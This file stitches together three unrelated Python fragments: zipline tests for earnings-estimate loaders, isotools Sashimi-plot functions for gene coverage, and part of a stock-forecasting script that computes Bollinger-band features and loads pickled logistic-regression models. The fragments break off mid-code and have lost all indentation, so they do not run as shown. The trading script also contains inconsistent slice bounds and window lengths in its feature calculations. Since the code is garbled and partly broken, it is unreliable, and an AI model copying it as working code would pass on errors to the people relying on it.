def make_events(cls):
return dummy_df
def test_wrong_num_announcements_passed(self):
bad_dataset1 = QuartersEstimates(-1)
bad_dataset2 = QuartersEstimates(-2)
good_dataset = QuartersEstimates(1)
engine = self.make_engine()
columns = {
c.name + str(dataset.num_announcements): c.latest
for dataset in (bad_dataset1, bad_dataset2, good_dataset)
for c in dataset.columns
}
p = Pipeline(columns)
err_msg = (
r"Passed invalid number of quarters -[0-9],-[0-9]; "
r"must pass a number of quarters >= 0"
)
with pytest.raises(ValueError, match=err_msg):
engine.run_pipeline(
p,
start_date=self.trading_days[0],
end_date=self.trading_days[-1],
)
def test_no_num_announcements_attr(self):
dataset = QuartersEstimatesNoNumQuartersAttr(1)
engine = self.make_engine()
p = Pipeline({c.name: c.latest for c in dataset.columns})
with pytest.raises(AttributeError):
engine.run_pipeline(
p,
start_date=self.trading_days[0],
end_date=self.trading_days[-1],
)
class PreviousWithWrongNumQuarters(WithWrongLoaderDefinition, ZiplineTestCase):
"""
Tests that previous quarter loader correctly breaks if an incorrect
number of quarters is passed.
"""
@classmethod
def make_loader(cls, events, columns):
return PreviousEarningsEstimatesLoader(events, columns)
class NextWithWrongNumQuarters(WithWrongLoaderDefinition, ZiplineTestCase):
"""
Tests that next quarter loader correctly breaks if an incorrect
number of quarters is passed.
"""
@classmethod
def make_loader(cls, events, columns):
return NextEarningsEstimatesLoader(events, columns)
options = [
"split_adjustments_loader",
"split_adjusted_column_names",
"split_adjusted_asof",
]
class WrongSplitsLoaderDefinition(WithEstimates, ZiplineTestCase):
"""
Test class that tests that loaders break correctly when incorrectly
instantiated.
Tests
-----
test_extra_splits_columns_passed(SplitAdjustedEstimatesLoader)
A test that checks that the loader correctly breaks when an
unexpected column is passed in the list of split-adjusted columns.
"""
@classmethod
def init_class_fixtures(cls):
super(WithEstimates, cls).init_class_fixtures()
@parameterized.expand(
itertools.product(
(
NextSplitAdjustedEarningsEstimatesLoader,
PreviousSplitAdjustedEarningsEstimatesLoader,
),
)
)
def test_extra_splits_columns_passed(self, loader):
columns = {
Estimates.event_date: "event_date",
Estimates.fiscal_quarter: "fiscal_quarter",
Estimates.fiscal_year: "fiscal_year",
Estimates.estimate: "estimate",
}
with pytest.raises(ValueError):
loader(
dummy_df,
{column.name: val for column, val in columns.items()},
split_adjustments_loader=self.adjustment_reader,
split_adjusted_column_names=["estimate", "extra_col"],
split_adjusted_asof=pd.Timestamp("2015-01-01"),
)
class WithEstimatesTimeZero(WithEstimates):
"""
ZiplineTestCase mixin providing cls.events as a class level fixture and
defining a test for all inheritors to use.
Attributes
----------
cls.events : pd.DataFrame
Generated dynamically in order to test inter-leavings of estimates and
event dates for multiple quarters to make sure that we select the
right immediate 'next' or 'previous' quarter relative to each date -
i.e., the right 'time zero' on the timeline. We care about selecting
the right 'time zero' because we use that to calculate which quarter's
data needs to be returned for each day.
Methods
-------
get_expected_estimate(q1_knowledge,
q2_knowledge,
comparable_date) -> pd.DataFrame
Retrieves the expected estimate given the latest knowledge about each
quarter and the date on which the estimate is being requested. If
there is no expected estimate, returns an empty DataFrame.
Tests
------
test_estimates()
Tests that we get the right 'time zero' value on each day for each
sid and for each column.
"""
# Shorter date range for performance
END_DATE = pd.Timestamp("2015-01-28", tz="utc")
q1_knowledge_dates = [
pd.Timestamp("2015-01-01"),
pd.Timestamp("2015-01-04"),
pd.Timestamp("2015-01-07"),
pd.Timestamp("2015-01-11"),
]
q2_knowledge_dates = [
pd.Timestamp("2015-01-14"),
pd.Timestamp("2015-01-17"),
pd.Timestamp("2015-01-20"),
pd.Timestamp("2015-01-23"),
]
# We want to model the possibility of an estimate predicting a release date
# that doesn't match the actual release. This could be done by dynamically
# generating more combinations with different release dates, but that
# significantly increases the amount of time it takes to run the tests.
# These hard-coded cases are sufficient to know that we can update our
# beliefs when we get | |
<reponame>carmineceraolo/isotools
import matplotlib.colors as plt_col
import matplotlib.patches as patches
import matplotlib.pyplot as plt
from matplotlib.ticker import FuncFormatter
import numpy as np
from math import log10
import logging
logger = logging.getLogger('isotools')
def _label_overlap(pos1, pos2, width, height):
if abs(pos1[0] - pos2[0]) < width and abs(pos1[1] - pos2[1]) < height:
return True
return False
DEFAULT_JPARAMS = [{'color': 'lightgrey', 'lwd': 1, 'draw_label': False}, # low coverage junctions
{'color': 'green', 'lwd': 1, 'draw_label': True}, # high coverage junctions
{'color': 'purple', 'lwd': 2, 'draw_label': True}] # junctions of interest
DEFAULT_PARAMS = dict(min_cov_th=.001, high_cov_th=.05, text_width=.02, arc_type='both', text_height=1, exon_color='green')
def extend_params(params):
if params is None:
params = dict()
params.setdefault('jparams', [{}, {}, {}])
# jparams=[params.pop(k,jparams[i]) for i,k in enumerate(['low_cov_junctions','high_cov_junctions','interest_junctions'])]
for i, k1 in enumerate(['low_cov_junctions', 'high_cov_junctions', 'interest_junctions']):
params['jparams'][i] = params.pop(k1, params['jparams'][i])
for k2, v in DEFAULT_JPARAMS[i].items():
params['jparams'][i].setdefault(k2, v)
for k, v in DEFAULT_PARAMS.items():
params.setdefault(k, v)
return params
def get_index(samples, names):
if not samples:
return []
if isinstance(names, list):
idx = {sa: i for i, sa in enumerate(names)}
else:
idx = {sa: i for i, sa in names.items()}
try:
sidx = [idx[sa] for sa in samples]
except KeyError:
notfound = [sa for sa in samples if sa not in idx]
logger.error('did not find the following samples: %s', ','.join(notfound))
raise
return sidx
# sashimi plots
def sashimi_figure(self, samples=None, short_read_samples=None, draw_gene_track=True,
long_read_params=None, short_read_params=None, junctions_of_interest=None, x_range=None):
'''Arranges multiple Sashimi plots of the gene.
The Sashimi figure consist of a reference gene track, long read sashimi plots for one or more samples or groups of samples,
and optionally short read sashimi plots for one or more samples or groups of samples.
:param samples: Definition of samples (as a list) or groups of samples (as a dict) for long read plots.
:param short_read_samples: Definition of samples (as a list) or groups of samples (as a dict) for short read plots.
:param draw_gene_track: Specify whether to plot the reference gene track.
:param long_read_params: Dict with parameters for the long read plots, get passed to self.sashimi_plot.
See isotools._gene_plots.DEFAULT_PARAMS and isotools._gene_plots.DEFAULT_JPARAMS
:param short_read_params: Dict with parameters for the short read plots, get passed to self.sashimi_plot_short_reads.
See isotools._gene_plots.DEFAULT_PARAMS and isotools._gene_plots.DEFAULT_JPARAMS
:param junctions_of_interest: List of int pairs to define junctions of interest (which are highlighed in the plots)
:param x_range: Genomic positions to specify the x range of the plot.
:return: Tuple with figure and axses'''
draw_gene_track = bool(draw_gene_track)
if samples is None:
samples = {}
if short_read_samples is None:
short_read_samples = {}
if not samples and not short_read_samples:
samples = {'all': None}
if long_read_params is None:
long_read_params = {}
if short_read_params is None:
short_read_params = {}
f, axes = plt.subplots(len(samples) + len(short_read_samples) + draw_gene_track)
axes = np.atleast_1d(axes) # in case there was only one subplot
if draw_gene_track:
self.gene_track(ax=axes[0], x_range=x_range)
for i, (sname, sidx) in enumerate(samples.items()):
self.sashimi_plot(sidx, sname, axes[i + draw_gene_track], junctions_of_interest, x_range=x_range, **long_read_params)
for i, (sname, sidx) in enumerate(short_read_samples.items()):
self.sashimi_plot_short_reads(sidx, sname, axes[i + len(samples) + draw_gene_track], junctions_of_interest, x_range=x_range, **long_read_params)
return f, axes
def sashimi_plot_short_reads(self, samples=None, title='short read coverage', ax=None, junctions_of_interest=None, x_range=None,
y_range=None, log_y=True,
jparams=None, min_cov_th=.001, high_cov_th=.05, text_width=.02, arc_type='both', text_height=1,
exon_color='green'):
'''Draws short read Sashimi plot of the gene.
The Sashimi plot depicts the genomic coverage from short read sequencing as blocks, and junction coverage as arcs.
:param samples: Names of the short read samples to be depicted (as a list).
:param title: Specify the title of the axis.
:param ax: Specify the axis.
:param junctions_of_interest: List of int pairs to define junctions of interest (which are highlighed in the plots)
:param x_range: Genomic positions to specify the x range of the plot.
:param y_range: Range for the coverage axis of the plot. Note to include space for the junction arcs.
If not specified, the range will be determined automatically.
:param log_y: Log scale for the coverage.
:param jparams: Define the apperance of junctions, depending on their priority.
A list with three dicts, defining parameters for low coverage junctions, high coverage junctions, and junctions of interest.
For default values, see isotools._gene_plots.DEFAULT_JPARAMS
:param exon_color: Specify the color of the genomic coverage blocks (e.g. the exons)
:param high_cov_th: Minimum coverage for a junction to be considdered high coverage.
:param min_cov_th: Coverage threshold for a junction to be considdered at all.
:param text_width: Control the horizontal space that gets reserved for labels on the arcs. This affects the height of the arcs.
:param arc_type: Label the junction arcs with the "coverage" (e.g. number of supporting reads),
"fraction" (e.g. fraction of supporting reads in %), or "both".
:param text_height: Control the vertical space that gets reserved for labels on the arcs. This affects the height of the arcs.'''
if samples is None:
samples = list(self._transcriptome.infos['short_reads']['name']) # all samples grouped # pylint: disable=W0212
sidx = get_index(samples, self._transcriptome.infos['short_reads']['name']) # pylint: disable=W0212
if x_range is None:
x_range = (self.start - 100, self.end + 100)
if jparams is None:
jparams = DEFAULT_JPARAMS
short_reads = [self.short_reads(idx) for idx in sidx]
# jparams=[low_cov_junctions,high_cov_junctions,interest_junctions]
start = short_reads[0].reg[1]
end = short_reads[0].reg[2]
# delta=np.zeros(end-start)
cov = np.zeros(end - start)
junctions = {}
for sr_cov in short_reads:
cov += sr_cov.profile
for k, v in sr_cov.junctions.items():
junctions[k] = junctions.get(k, 0) + v
if high_cov_th < 1:
high_cov_th *= max(cov)
if min_cov_th < 1:
min_cov_th *= max(cov)
if log_y:
cov = np.log10(cov, where=cov > 0, out=np.nan * cov)
# exons
if ax is None:
_, ax = plt.subplots()
ax.fill_between(range(start, end), 0, cov, facecolor=exon_color)
# junctions
textpositions = []
for (x1, x2), w in junctions.items():
if junctions_of_interest is not None and (x1, x2) in junctions_of_interest:
priority = 2
elif w < min_cov_th:
continue
elif w < high_cov_th:
priority = 0
else:
priority = 1
y1 = cov[x1 - start - 1]
y2 = cov[x2 - start]
center = (x1 + x2) / 2
width = x2 - x1
bow_height = text_height
if jparams[priority]['draw_label']:
while any(_label_overlap((center, max(y1, y2) + bow_height), tp, text_width, text_height) for tp in textpositions):
bow_height += text_height
textpositions.append((center, max(y1, y2) + bow_height))
if y1 < y2:
bow_height = (y2 - y1 + bow_height, bow_height)
elif y1 > y2:
bow_height = (bow_height, bow_height + y1 - y2)
else:
bow_height = (bow_height, bow_height)
bow1 = patches.Arc((center, y1), width=width, height=bow_height[0] * 2, theta1=90, theta2=180,
linewidth=jparams[priority]['lwd'], edgecolor=jparams[priority]['color'], zorder=priority)
bow2 = patches.Arc((center, y2), width=width, height=bow_height[1] * 2, theta1=0, theta2=90,
linewidth=jparams[priority]['lwd'], edgecolor=jparams[priority]['color'], zorder=priority)
ax.add_patch(bow1)
ax.add_patch(bow2)
if jparams[priority]['draw_label']:
_ = ax.text(center, max(y1, y2) + min(bow_height) + text_height / 3, w, horizontalalignment='center', verticalalignment='bottom',
bbox=dict(boxstyle='round', facecolor='wheat', edgecolor=None, alpha=0.5)).set_clip_on(True)
# bbox_list.append(txt.get_tightbbox(renderer = fig.canvas.renderer))
ax.set_xlim(*x_range)
if y_range is not None:
ax.set_ylim(*y_range)
if textpositions:
ax.set_ylim(-text_height, max(tp[1] for tp in textpositions) + 2 * text_height)
else:
ax.set_ylim(-text_height, 3) # todo: adjust y axis and ticklabels to coverage
ax.set(frame_on=False)
if log_y:
ax.set_yticks([0, 1, 2, 3])
ax.set_yticklabels([1, 10, 100, 1000])
# ax.ticklabel_format(axis='x', style='sci',scilimits=(6,6))
ax.set_title(title)
ax.xaxis.set_major_formatter(FuncFormatter(lambda x, pos=None: f'{x:,.0f}'))
return ax
def sashimi_plot(self, samples=None, title='Long read sashimi plot', ax=None, junctions_of_interest=None, x_range=None, select_transcripts=None,
y_range=None, log_y=True,
jparams=None, exon_color='green', min_cov_th=.001, high_cov_th=.05, text_width=1,
arc_type='both', text_height=1):
'''Draws long read Sashimi plot of the gene.
The Sashimi plot depicts the genomic long read sequencing coverage of one or more samples as blocks, and junction coverage as arcs.
:param samples: Names of the samples to be depicted (as a list).
:param title: Specify the title of the axis.
:param ax: Specify the axis.
:param junctions_of_interest: List of int pairs to define junctions of interest (which are highlighed in the plots)
:param x_range: Genomic positions to specify the x range of the plot.
If not specified, the range will be determined to include the complete gene.
:param y_range: Range for the coverage axis of the plot. Note to include space for the junction arcs.
If not specified, the range will be determined automatically.
:param log_y: Log scale for the coverage.
:param select_transcripts: A list of transcript numbers from which the coverage is to be depicted.
If obmitted, all transcripts are displayed.
:param jparams: Define the apperance of junctions, depending on their priority.
A list with three dicts, defining parameters for low coverage junctions, high coverage junctions, and junctions of interest.
For default values, see isotools._gene_plots.DEFAULT_JPARAMS
:param exon_color: | |
_BBD300 = np.sum(Close[:-301:-1])/300-(np.std(Close[-301:-1])*2) # Lower BollingerBand
_DiffD300_C = (Close[-1]-_BBD300)/_BBD300
_DiffD300_H3 = (_SMA_H3-_BBD300)/_BBD300
_BBD377 = np.sum(Close[:-378:-1])/377-(np.std(Close[-378:-1])*2) # Lower BollingerBand
_DiffD377_H3 = (_SMA_H3-_BBD377)/_BBD377
_DiffD377_C = (Close[-1]-_BBD377)/_BBD377
_BBU8 = np.sum(Close[:-9:-1])/8+(np.std(Close[:-9:-1])*2)
_DiffU8_C = np.round((Close[-1]-_BBU8)/_BBU8,3)
_BBU13 = np.sum(Close[:-14:-1])/13+(np.std(Close[:-14:-1])*2)
_DiffU13_L3 = np.round((_SMA_L3-_BBU13)/_BBU13,3)
_BBU21 = np.sum(Close[:-22:-1])/21+(np.std(Close[:-22:-1])*2)
_DiffU21_L3 = (_SMA_L3-_BBU21)/_BBU21
_DiffU21_C = (Close[-1]-_BBU21)/_BBU21
_BBU34 = np.sum(Close[:-35:-1])/34+(np.std(Close[:-35:-1])*2)
_DiffU34_C = (Close[-1]-_BBU34)/_BBU34
_DiffU34_L3 = (_SMA_L3-_BBU34)/_BBU34
_BBU55 = np.sum(Close[:-56:-1])/55+(np.std(Close[:-56:-1])*2)
_DiffU55_C = (Close[-1]-_BBU55)/_BBU55
_DiffU55_L3 = (_SMA_L3-_BBU55)/_BBU55
_BBU89 = np.sum(Close[:-90:-1])/89+(np.std(Close[:-90:-1])*2)
_DiffU89_C = (Close[-1]-_BBU89)/_BBU89
_BBU100 = np.sum(Close[:-101:-1])/100+(np.std(Close[:-101:-1])*2)
_DiffU100_C = (Close[-1]-_BBU100)/_BBU100
_BBU144 = np.sum(Close[:-145:-1])/144+(np.std(Close[:-145:-1])*2)
_DiffU144_C = (Close[-1]-_BBU144)/_BBU144
_DiffU144_L3 = (_SMA_L3-_BBU144)/_BBU144
_BBU200 = np.sum(Close[:-201:-1])/200+(np.std(Close[:-201:-1])*2)
_DiffU200_L3 = (_SMA_L3-_BBU200)/_BBU200
_BBU233 = np.sum(Close[:234:-1])/233+(np.std(Close[:234:-1])*2)
_DiffU233_L3 = (_SMA_L3-_BBU233)/_BBU233
_DiffU233_C = (Close[-1]-_BBU233)/_BBU233
_BBU300 = np.sum(Close[:301:-1])/300+(np.std(Close[:301:-1])*2)
_DiffU300_L3 = (_SMA_L3-_BBU300)/_BBU300
_DiffU300_C = (Close[-1]-_BBU300)/_BBU300
_BBU377 = np.sum(Close[:377:-1])/377+(np.std(Close[:377:-1])*2)
_DiffU377_L3 = (_SMA_L3-_BBU377)/_BBU377
_DiffU377_C = (Close[-1]-_BBU377)/_BBU377
_High3_H = (Close[-1]-np.amax(High[:-4:-1]))/np.amax(High[:-4:-1])
_High5_H = (Close[-1]-np.amax(High[:-6:-1]))/np.amax(High[:-6:-1])
_High7_H = (Close[-1]-np.amax(High[:-8:-1]))/np.amax(High[:-8:-1])
_High11_H = (Close[-1]-np.amax(High[:-12:-1]))/np.amax(High[:-12:-1])
_High14_H = (Close[-1]-np.amax(High[:-15:-1]))/np.amax(High[:-15:-1])
_High13_H = (Close[-1]-np.amax(High[:-14:-1]))/np.amax(High[:-14:-1])
_High23_H = (Close[-1]-np.amax(High[:-24:-1]))/np.amax(High[:-24:-1])
_High55_H = (Close[-1]-np.amax(High[:-56:-1]))/np.amax(High[:-56:-1])
_High233_H = (Close[-1]-np.amax(High[:-234:-1]))/np.amax(High[:-234:-1])
_Low6_L = (Close[-1]-np.amin(Low[:-7:-1]))/np.amin(Low[:-7:-1])
_Low7_L = (Close[-1]-np.amin(Low[:-8:-1]))/np.amin(Low[:-8:-1])
_Low8_L = (Close[-1]-np.amin(Low[:-9:-1]))/np.amin(Low[:-9:-1])
_Low10_L = (Close[-1]-np.amin(Low[:-11:-1]))/np.amin(Low[:-11:-1])
_Low12_L = (Close[-1]-np.amin(Low[:-13:-1]))/np.amin(Low[:-13:-1])
_Low14_L = (Close[-1]-np.amin(Low[:-15:-1]))/np.amin(Low[:-15:-1])
_Low15_L = (Close[-1]-np.amin(Low[:-16:-1]))/np.amin(Low[:-16:-1])
_Low19_L = (Close[-1]-np.amin(Low[:-20:-1]))/np.amin(Low[:-20:-1])
_Low23_L = (Close[-1]-np.amin(Low[:-24:-1]))/np.amin(Low[:-24:-1])
_Low25_L = (Close[-1]-np.amin(Low[:-26:-1]))/np.amin(Low[:-26:-1])
_Low34_L = (Close[-1]-np.amin(Low[:-35:-1]))/np.amin(Low[:-35:-1])
_Low55_L = (Close[-1]-np.amin(Low[:-56:-1]))/np.amin(Low[:-56:-1])
_Low89_L = (Close[-1]-np.amin(Low[:-99:-1]))/np.amin(Low[:-99:-1])
_Low144_L = (Close[-1]-np.amin(Low[:-145:-1]))/np.amin(Low[:-145:-1])
_Low233_L = (Close[-1]-np.amin(Low[:-234:-1]))/np.amin(Low[:-234:-1])
df = pd.DataFrame(columns = FEATURES_IQ19)
df = df.append({
'_BBD55':_BBD55,
'_BBU144':_BBU144,
'_BBU300':_BBU300,
'_BBU55':_BBU55,
'_dateDayOfMonth':_dateDayOfMonth,
'_dateDayOfYear':_dateDayOfYear,
'_dateMonthOfYear':_dateMonthOfYear,
'_dateWeekOfYear':_dateWeekOfYear,
'_Diff_CtoH19':_Diff_CtoH19,
'_Diff_CtoH5':_Diff_CtoH5,
'_Diff_CtoL19':_Diff_CtoL19,
'_Diff_CtoL20':_Diff_CtoL20,
'_Diff_CtoL9':_Diff_CtoL9,
'_DiffD100_H3':_DiffD100_H3,
'_diffStochSign100':_diffStochSign100,
'_diffStochSign34':_diffStochSign34,
'_DiffU8_C':_DiffU8_C,
'_EvNo20':_EvNo20,
'_Low55_L':_Low55_L,
'_Low8_L':_Low8_L,
'_Low89_L':_Low89_L,
'_PastSCH13to34':_PastSCH13to34,
'_PastSCH21to34':_PastSCH21to34,
'_Perc200_L20':_Perc200_L20,
'_Perc21_H':_Perc21_H,
'_Perc233_H80':_Perc233_H80,
'_Perc377_L':_Perc377_L,
'_Perc8_H80':_Perc8_H80,
'_SMA233vs377':_SMA233vs377,
'_SMA34vs89':_SMA34vs89,
'_SMA8_C':_SMA8_C,
'_SMA89vs144':_SMA89vs144,
'_STD13sign':_STD13sign,
'_STD144sign':_STD144sign,
'_STD233_C':_STD233_C,
'_STD300_C':_STD300_C,
'_STD300sign':_STD300sign,
'_STD34_C':_STD34_C,
'_STD377_C':_STD377_C,
'_stoch377Level':_stoch377Level,
'Diff_RL100_RL377':Diff_RL100_RL377,
'Diff_RL144_RL200':Diff_RL144_RL200,
'Diff_RL144_RL377':Diff_RL144_RL377,
'Diff_RL200_RL377':Diff_RL200_RL377,
'Diff_RL21_RL34':Diff_RL21_RL34,
'Diff_RL233_RL377':Diff_RL233_RL377,
'Diff_RL5_RL21':Diff_RL5_RL21,
'Diff_RL55_RL89':Diff_RL55_RL89,
'Diff_RL8_RL55':Diff_RL8_RL55,
'RL200':RL200
}, ignore_index = True)
FileLocation4excel = importantPath+'\\for'+eachTicker+'_excel.xlsx'
print("Priming {0}".format(FileLocation4excel))
df.to_excel(FileLocation4excel, index=False)
#print(df)
except Exception as e:
print("Exception before saving excel: " + str(e))
pass
c.timer.print_elapsed("\nFinished computing features and priming files")
###################################################################3
Ultimate_df2 = pd.DataFrame(columns = ['Name', 'Forecast'])
from sklearn.externals import joblib
print("Loading pickled files...")
logreg_01 = joblib.load(r''+importantPath+pklFiles+'01.pkl')
logreg_02 = joblib.load(r''+importantPath+pklFiles+'02.pkl')
logreg_03 = joblib.load(r''+importantPath+pklFiles+'03.pkl')
logreg_04 = joblib.load(r''+importantPath+pklFiles+'04.pkl')
logreg_05 = joblib.load(r''+importantPath+pklFiles+'05.pkl')
logreg_06 = joblib.load(r''+importantPath+pklFiles+'06.pkl')
logreg_07 = joblib.load(r''+importantPath+pklFiles+'07.pkl')
logreg_08 = joblib.load(r''+importantPath+pklFiles+'08.pkl')
logreg_09 = joblib.load(r''+importantPath+pklFiles+'09.pkl')
logreg_10 = joblib.load(r''+importantPath+pklFiles+'10.pkl')
logreg_11 = joblib.load(r''+importantPath+pklFiles+'11.pkl')
logreg_12 = joblib.load(r''+importantPath+pklFiles+'12.pkl')
logreg_13 = joblib.load(r''+importantPath+pklFiles+'13.pkl')
logreg_14 = joblib.load(r''+importantPath+pklFiles+'14.pkl')
logreg_15 = joblib.load(r''+importantPath+pklFiles+'15.pkl')
logreg_16 = joblib.load(r''+importantPath+pklFiles+'16.pkl')
logreg_17 = joblib.load(r''+importantPath+pklFiles+'17.pkl')
logreg_18 = joblib.load(r''+importantPath+pklFiles+'18.pkl')
logreg_19 = joblib.load(r''+importantPath+pklFiles+'19.pkl')
logreg_20 = joblib.load(r''+importantPath+pklFiles+'20.pkl')
logreg_21 = joblib.load(r''+importantPath+pklFiles+'21.pkl')
logreg_22 = joblib.load(r''+importantPath+pklFiles+'22.pkl')
logreg_23 = joblib.load(r''+importantPath+pklFiles+'23.pkl')
logreg_24 = joblib.load(r''+importantPath+pklFiles+'24.pkl')
logreg_25 = joblib.load(r''+importantPath+pklFiles+'25.pkl')
logreg_26 = joblib.load(r''+importantPath+pklFiles+'26.pkl')
logreg_27 = joblib.load(r''+importantPath+pklFiles+'27.pkl')
logreg_28 = joblib.load(r''+importantPath+pklFiles+'28.pkl')
logreg_29 = joblib.load(r''+importantPath+pklFiles+'29.pkl')
logreg_30 = joblib.load(r''+importantPath+pklFiles+'30.pkl')
for eachTicker, eachRealNames in zip(yahoo_ticker_list, yahoo_RealNames_list):
print("\n== Starting calculations for {0} ===".format(eachTicker))
try:
Location = importantPath+'\\for'+eachTicker+'_excel.xlsx'
print("Reading {0}".format(Location))
data = pd.read_excel(Location)
feat01 = np.array(data[FEATURES01].values) # making a Numpay array from the Pandas dataset
feat02 = np.array(data[FEATURES02].values) # making a Numpay array from the Pandas dataset
feat03 = np.array(data[FEATURES03].values) # making a Numpay array from the Pandas dataset
feat04 = np.array(data[FEATURES04].values) # making a Numpay array from the Pandas dataset
feat05 = np.array(data[FEATURES05].values) # making a Numpay array from the Pandas dataset
feat06 = np.array(data[FEATURES06].values) # making a Numpay array from the Pandas dataset
feat07 = np.array(data[FEATURES07].values) # making a Numpay array from the Pandas dataset
feat08 = np.array(data[FEATURES08].values) # making a Numpay array from the Pandas dataset
feat09 = np.array(data[FEATURES09].values) # making a Numpay array from the Pandas dataset
feat10 = np.array(data[FEATURES10].values) # making a Numpay array from the Pandas dataset
feat11 = np.array(data[FEATURES11].values) # making a Numpay array from the Pandas dataset
feat12 = np.array(data[FEATURES12].values) # making a Numpay array from the Pandas dataset
feat13 = np.array(data[FEATURES13].values) # making a Numpay array from the Pandas dataset
feat14 = np.array(data[FEATURES14].values) # making a Numpay array from the Pandas dataset
feat15 = np.array(data[FEATURES15].values) # making a Numpay array from the Pandas dataset
feat16 = np.array(data[FEATURES16].values) # making a Numpay array from the Pandas dataset
feat17 = np.array(data[FEATURES17].values)
feat18 = np.array(data[FEATURES18].values)
feat19 = np.array(data[FEATURES19].values)
feat20 = np.array(data[FEATURES20].values)
feat21 = np.array(data[FEATURES21].values)
feat22 = np.array(data[FEATURES22].values)
feat23 = np.array(data[FEATURES23].values)
feat24 = np.array(data[FEATURES24].values)
feat25 = np.array(data[FEATURES25].values)
feat26 = np.array(data[FEATURES26].values)
feat27 = np.array(data[FEATURES27].values)
feat28 = np.array(data[FEATURES28].values)
feat29 = np.array(data[FEATURES29].values)
feat30 = np.array(data[FEATURES30].values)
print("Finished reading {0} and converting to arrays".format(Location))
except Exception as e:
print("Error reading xlsx: " + str(e))
##########################################################################
try:
print("Predicting probabilities for features...")
feats = [
feat01, feat02, feat03, feat04, feat05, feat06, feat07, feat08, feat09, feat10,
feat11, feat12, feat13, feat14, feat15, feat16, feat17, feat18, feat19, feat20,
feat21, feat22, feat23, feat24, feat25, feat26, feat27, feat28, feat29, feat30
]
for currentFeat in feats:
for index, feat in enumerate(currentFeat[0]):
if type(feat) is str:
# Fix for (probably inconsistencies of pickled data of older version, should probably be removed)
print("HACK: Converting: '{0}' due to old pickle format, assuming array syntax => single float".format(feat))
currentFeat[0, index] = float(feat[1:-1]) # float convert literal array syntax, possibly incorrect
#print("Converted {0}".format(currentFeat[0, index]))
#print(feat)
#print(index)
#print(type(feat))
Value_01 = logreg_01.predict_proba(feat01)
_01N5 = round(Value_01[0][0],6)
_01N4 = round(Value_01[0][1],6)
_01N3 = round(Value_01[0][2],6)
_01N2 = round(Value_01[0][3],6)
_01N1 = round(Value_01[0][4],6)
_01P1 = round(Value_01[0][6],6)
_01P2 = round(Value_01[0][7],6)
_01P3 = round(Value_01[0][8],6)
_01P4 = round(Value_01[0][9],6)
_01P5 = round(Value_01[0][10],6)
Value_02 = logreg_02.predict_proba(feat02)
_02N5 = round(Value_02[0][0],6)
_02N4 = round(Value_02[0][1],6)
_02N3 = round(Value_02[0][2],6)
_02N2 = round(Value_02[0][3],6)
_02N1 = round(Value_02[0][4],6)
_02P1 = round(Value_02[0][6],6)
_02P2 = round(Value_02[0][7],6)
_02P3 = round(Value_02[0][8],6)
_02P4 = round(Value_02[0][9],6)
_02P5 = round(Value_02[0][10],6)
Value_03 = logreg_03.predict_proba(feat03)
_03N5 = round(Value_03[0][0],6)
_03N4 = round(Value_03[0][1],6)
_03N3 = round(Value_03[0][2],6)
_03N2 = round(Value_03[0][3],6)
_03N1 = round(Value_03[0][4],6)
_03P1 = round(Value_03[0][6],6)
_03P2 = round(Value_03[0][7],6)
_03P3 = round(Value_03[0][8],6)
_03P4 = round(Value_03[0][9],6)
_03P5 = round(Value_03[0][10],6)
Value_04 = logreg_04.predict_proba(feat04)
_04N5 = round(Value_04[0][0],6)
_04N4 = round(Value_04[0][1],6)
_04N3 = round(Value_04[0][2],6)
_04N2 = round(Value_04[0][3],6)
_04N1 = round(Value_04[0][4],6)
_04P1 = round(Value_04[0][6],6)
_04P2 = round(Value_04[0][7],6)
_04P3 = round(Value_04[0][8],6)
_04P4 = round(Value_04[0][9],6)
_04P5 = round(Value_04[0][10],6)
Value_05 = logreg_05.predict_proba(feat05)
_05N5 = round(Value_05[0][0],6)
_05N4 = round(Value_05[0][1],6)
_05N3 = round(Value_05[0][2],6)
_05N2 = round(Value_05[0][3],6)
_05N1 = round(Value_05[0][4],6)
_05P1 = round(Value_05[0][6],6)
_05P2 = round(Value_05[0][7],6)
_05P3 = round(Value_05[0][8],6)
_05P4 = round(Value_05[0][9],6)
_05P5 = round(Value_05[0][10],6)
Value_06 = logreg_06.predict_proba(feat06)
_06N5 = round(Value_06[0][0],6)
_06N4 = round(Value_06[0][1],6)
_06N3 = round(Value_06[0][2],6)
_06N2 = round(Value_06[0][3],6)
_06N1 = round(Value_06[0][4],6)
_06P1 = round(Value_06[0][6],6)
_06P2 = round(Value_06[0][7],6)
_06P3 = round(Value_06[0][8],6)
_06P4 = round(Value_06[0][9],6)
_06P5 = round(Value_06[0][10],6)
Value_07 = logreg_07.predict_proba(feat07)
_07N5 = round(Value_07[0][0],6)
_07N4 = round(Value_07[0][1],6)
_07N3 = round(Value_07[0][2],6)
_07N2 = round(Value_07[0][3],6)
_07N1 = round(Value_07[0][4],6)
_07P1 = round(Value_07[0][6],6)
_07P2 = round(Value_07[0][7],6)
_07P3 = round(Value_07[0][8],6)
_07P4 = round(Value_07[0][9],6)
_07P5 = round(Value_07[0][10],6)
Value_08 = logreg_08.predict_proba(feat08)
_08N5 = round(Value_08[0][0],6)
_08N4 = round(Value_08[0][1],6)
_08N3 = round(Value_08[0][2],6)
_08N2 = round(Value_08[0][3],6)
_08N1 = round(Value_08[0][4],6)
_08P1 = round(Value_08[0][6],6)
_08P2 = round(Value_08[0][7],6)
_08P3 = round(Value_08[0][8],6)
_08P4 = round(Value_08[0][9],6)
_08P5 = round(Value_08[0][10],6)
Value_09 = logreg_09.predict_proba(feat09)
_09N5 = round(Value_09[0][0],6)
_09N4 = round(Value_09[0][1],6)
_09N3 = round(Value_09[0][2],6)
_09N2 = round(Value_09[0][3],6)
_09N1 = round(Value_09[0][4],6)
_09P1 = round(Value_09[0][6],6)
_09P2 = round(Value_09[0][7],6)
_09P3 = round(Value_09[0][8],6)
_09P4 = round(Value_09[0][9],6)
_09P5 = round(Value_09[0][10],6)
Value_10 = logreg_10.predict_proba(feat10)
_10N5 = round(Value_10[0][0],6)
_10N4 = round(Value_10[0][1],6)
_10N3 = round(Value_10[0][2],6)
_10N2 = round(Value_10[0][3],6)
_10N1 = round(Value_10[0][4],6)
_10P1 = round(Value_10[0][6],6)
_10P2 = round(Value_10[0][7],6)
_10P3 = round(Value_10[0][8],6)
_10P4 = round(Value_10[0][9],6)
_10P5 = round(Value_10[0][10],6)
Value_11 = logreg_11.predict_proba(feat11)
_11N5 = round(Value_11[0][0],6)
_11N4 = round(Value_11[0][1],6)
_11N3 = round(Value_11[0][2],6)
_11N2 = round(Value_11[0][3],6)
_11N1 = round(Value_11[0][4],6)
_11P1 = round(Value_11[0][6],6)
_11P2 = round(Value_11[0][7],6)
_11P3 = round(Value_11[0][8],6)
